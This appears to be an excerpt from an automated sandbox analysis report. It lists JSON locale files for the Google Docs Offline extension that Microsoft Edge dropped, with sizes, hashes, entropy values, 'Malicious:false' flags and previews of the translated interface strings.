                                                                                                                                                                                                                                                                                    Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                    MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                    SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                    SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                    SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1244
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                    MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                    SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                    SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                    SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                    MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                    SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                    SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                    SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3107
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1389
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1763
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):930
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):913
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):806
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                    MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                    SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                    SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                    SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                    MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                    SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                    SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                    SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):848
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                    MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                    SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                    SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                    SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                    MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                    SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                    SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                    SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):961
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                    MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                    SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                    SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                    SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):959
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                    MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                    SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                    SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                    SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):968
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                    MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                    SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                    SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                    SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):838
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                    Encrypted:false
